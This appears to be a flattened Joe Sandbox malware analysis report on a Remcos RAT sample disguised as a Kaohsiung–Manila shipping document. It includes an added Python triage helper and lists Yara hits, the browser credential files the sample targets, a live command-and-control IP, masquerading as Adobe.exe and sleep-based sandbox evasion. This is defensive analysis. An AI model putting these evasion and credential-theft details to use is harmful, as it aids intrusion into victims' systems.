Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\Adobe\Adobe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_00434010
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0041A7A2 GetUserNameW, 3_2_0041A7A2
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: 3_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 3_2_0044800F
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
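The thread-sleep, write-watch and process-creation rows above are raw sandbox output, and the numbers they carry are more useful once combined: a "Thread sleep count" row and the "Thread sleep time" row for the same thread give the per-call sleep length, and the repeated 922337203685477 delay is Int64.MaxValue ticks divided by the 10 000 ticks per millisecond, i.e. a .NET TimeSpan.MaxValue wait. The following Python is an added triage helper, not Joe Sandbox code, that parses rows in exactly the shape printed in this report and derives those facts. Its sample rows are copied from the report; it assumes that the values Joe prints with an "s" suffix are milliseconds (the -30000 threshold beside them matches the 30 000 ms stalling rule), and that a "Thread sleep count" row is always followed by the "Thread sleep time" row of the same thread.

```python
"""Triage helper for the flattened Joe Sandbox behavior rows reproduced above.

Added example, not Joe Sandbox code. It parses four row types seen in this
report and turns them into the facts an analyst wants from them:
  * "Thread sleep count: N > 30" followed by "Thread sleep time: -T s" for the
    same thread -> per-call sleep length and total delay of the stalling loop
  * "Thread sleep time: -922337203685477s" with no count -> an effectively
    infinite wait (Int64.MaxValue ticks / 10 000 = TimeSpan.MaxValue in ms)
  * "Memory allocated: ADDR memory reserve | memory write watch"
    -> MEM_WRITE_WATCH reservations
  * 'Process created: CHILD "cmdline"' -> parent -> child process edges
Assumption: the numbers Joe prints with an "s" suffix are milliseconds, because
the -30000 threshold printed beside them is the 30 000 ms stalling rule.
"""
import re
from collections import defaultdict

SAMPLE_EXE = r"C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
DROPPED_EXE = r"C:\ProgramData\Adobe\Adobe.exe"

# Rows copied from this report. The text extraction glues the Source path to the
# detail text and leaves the "Jump to behavior" link label on every row; the
# parser accepts that form as well as a cleaned "Source: path | detail" form.
SAMPLE_ROWS = [
    f"Source: {DROPPED_EXE}Memory allocated: 2FA0000 memory reserve | memory write watchJump to behavior",
    f"Source: {DROPPED_EXE}Memory allocated: 2DA0000 memory reserve | memory write watchJump to behavior",
    f"Source: {DROPPED_EXE} TID: 2228Thread sleep time: -922337203685477s >= -30000sJump to behavior",
    f"Source: {DROPPED_EXE} TID: 6036Thread sleep count: 4500 > 30Jump to behavior",
    f"Source: {DROPPED_EXE} TID: 6036Thread sleep time: -13500000s >= -30000sJump to behavior",
    f"Source: {DROPPED_EXE} TID: 6036Thread sleep count: 5494 > 30Jump to behavior",
    f"Source: {DROPPED_EXE} TID: 6036Thread sleep time: -16482000s >= -30000sJump to behavior",
    f'Source: {SAMPLE_EXE}Process created: {SAMPLE_EXE} "{SAMPLE_EXE}"Jump to behavior',
    f'Source: {SAMPLE_EXE}Process created: {DROPPED_EXE} "{DROPPED_EXE}" Jump to behavior',
    f'Source: {DROPPED_EXE}Process created: {DROPPED_EXE} "{DROPPED_EXE}"Jump to behavior',
    f'Source: {DROPPED_EXE}Process created: {DROPPED_EXE} "{DROPPED_EXE}"Jump to behavior',
]

ROW = re.compile(
    r"^Source:\s*(?P<src>.+?)(?:\s+TID:\s*(?P<tid>\d+))?\s*\|?\s*"
    r"(?P<kind>Thread sleep count|Thread sleep time|Memory allocated|Process created):\s*"
    r"(?P<rest>.*?)\s*(?:Jump to behavior)?\s*$"
)
PROC = re.compile(r'^(?P<child>.+?)\s+"(?P<cmdline>.*)"$')

TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477, the delay value in the rows above


def parse_behavior_rows(rows):
    """Group rows into sleep loops, infinite waits, write-watch allocations and a process tree."""
    out = {"sleep_loops": [], "infinite_waits": [], "write_watch": [],
           "process_tree": defaultdict(list)}
    pending = {}  # (src, tid) -> sleep count still waiting for its 'sleep time' row
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            continue  # a row type this helper does not model
        src, tid, kind, rest = m.group("src", "tid", "kind", "rest")
        tid = int(tid) if tid else None
        if kind == "Thread sleep count":
            pending[(src, tid)] = int(rest.split()[0])
        elif kind == "Thread sleep time":
            total_ms = int(re.match(r"-?(\d+)", rest).group(1))
            count = pending.pop((src, tid), None)
            if count:
                out["sleep_loops"].append({"source": src, "tid": tid, "count": count,
                                           "total_ms": total_ms,
                                           "per_call_ms": total_ms / count})
            elif total_ms >= TIMESPAN_MAX_MS:
                out["infinite_waits"].append({"source": src, "tid": tid, "ms": total_ms})
        elif kind == "Memory allocated" and "write watch" in rest:
            out["write_watch"].append({"source": src, "address": rest.split()[0]})
        elif kind == "Process created":
            pm = PROC.match(rest)
            if pm:
                out["process_tree"][src].append(pm.group("child"))
    return out


def describe(result):
    """One human-readable line per finding."""
    lines = []
    for s in result["sleep_loops"]:
        lines.append(f"TID {s['tid']}: {s['count']} x Sleep({s['per_call_ms']:.0f} ms) = "
                     f"{s['total_ms'] / 3_600_000:.2f} h of stalling in {s['source']}")
    for w in result["infinite_waits"]:
        lines.append(f"TID {w['tid']}: waits TimeSpan.MaxValue (never wakes) in {w['source']}")
    for a in result["write_watch"]:
        lines.append(f"MEM_WRITE_WATCH reservation at 0x{a['address']} by {a['source']}")
    for parent, children in result["process_tree"].items():
        lines.append(f"{parent} spawned {len(children)} process(es): {sorted(set(children))}")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(parse_behavior_rows(SAMPLE_ROWS))))
```

Run as a script it prints the summary for the embedded rows; pass it the rows of this section instead to triage the whole block. The derived 3 000 ms per call is what distinguishes a Sleep(3000) loop of 4 500 iterations (3.75 hours of stalling) from one long sleep, which matters when deciding whether sleep-skipping or a loop-count patch is the right sandbox countermeasure.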

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.2dee2b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Adobe.exe.250dcf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 3_2_0040B21B
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 3_2_0040B335
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: \key3.db 3_2_0040B335

                    Remote Access Functionality

Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.2dee2b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Adobe.exe.250dcf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | Code function: cmd.exe 3_2_00405042
Mitre Att&ck Matrix (numbers in parentheses are the signature counts attached to matched techniques)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (1) | Windows Service (1) | Bypass User Account Control (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (111) | Account Discovery (1) | Remote Desktop Protocol | Input Capture (111) | Encrypted Channel (2) | Exfiltration Over Bluetooth | Defacement (1)
Email Addresses | DNS Server | Domain Accounts | Service Execution (2) | Registry Run Keys / Startup Folder (11) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Credentials In Files (2) | System Service Discovery (1) | SMB/Windows Admin Shares | Clipboard Data (3) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Windows Service (1) | Software Packing (2) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (2) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (22) | Timestomp (1) | LSA Secrets | System Information Discovery (33) | SSH | Keylogging | Application Layer Protocol (12) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Registry Run Keys / Startup Folder (11) | DLL Side-Loading (1) | Cached Domain Credentials | Security Software Discovery (121) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Bypass User Account Control (1) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Masquerading (11) | Proc Filesystem | Process Discovery (3) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (31) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Access Token Manipulation (1) | Network Sniffing | System Owner/User Discovery (1)
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd22
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Behavior Graph (ID: 1564895, Sample: #U4f73#U5ddd#U7acb 20241202..., Startdate: 29/11/2024, Architecture: WINDOWS, Score: 100)

                    Start
                      DNS/IP: geoplugin.net
                      Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
                      • #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe (started)
                          Created file: #U4f73#U5ddd#U7acb...x20' SO.scr.exe.log, ASCII (dropped)
                          • #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe (child process, started)
                              Created files: C:\ProgramData\Adobe\Adobe.exe, PE32 (dropped); C:\ProgramData\...\Adobe.exe:Zone.Identifier, ASCII (dropped)
                              Signatures: Creates autostart registry keys with suspicious names; Drops executable to a common third party application directory
                              • Adobe.exe (started)
                                  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                  • Adobe.exe (started)
                                      DNS/IP: 104.250.180.178, ports 49707, 7902, M247GB, United States
                                      DNS/IP: geoplugin.net 178.237.33.50, ports 49709, 80, ATOM86-ASATOM86NL, Netherlands
                                  • Adobe.exe (started)
                                  • Adobe.exe (started)
                      • Adobe.exe (started), which in turn starts Adobe.exe (this chain appears three times, from three separate Adobe.exe launches at the start node)

                    Source | Detection | Scanner | Label
                    #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | 66% | ReversingLabs | Win32.Trojan.Remcos
                    #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe | 100% | Joe Sandbox ML |
                    Source | Detection | Scanner | Label
                    C:\ProgramData\Adobe\Adobe.exe | 100% | Joe Sandbox ML |
                    C:\ProgramData\Adobe\Adobe.exe | 66% | ReversingLabs | Win32.Trojan.Remcos
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    geoplugin.net | 178.237.33.50 | true | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://geoplugin.net/json.gp | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://geoplugin.net/json.gp$ | Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/json.gp/C | #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp; #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp; #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp; #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/json.gpl | Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://geoplugin.net/json.gpSystem32 | Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                IP | Domain | Country | ASN | ASN Name | Malicious
                                104.250.180.178 | unknown | United States | 9009 | M247GB | true
                                178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1564895
                                Start date and time:2024-11-29 00:00:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 38s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of new started processes analysed:16
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                renamed because original name is a hash value
                                Original Sample Name: 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@20/5@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
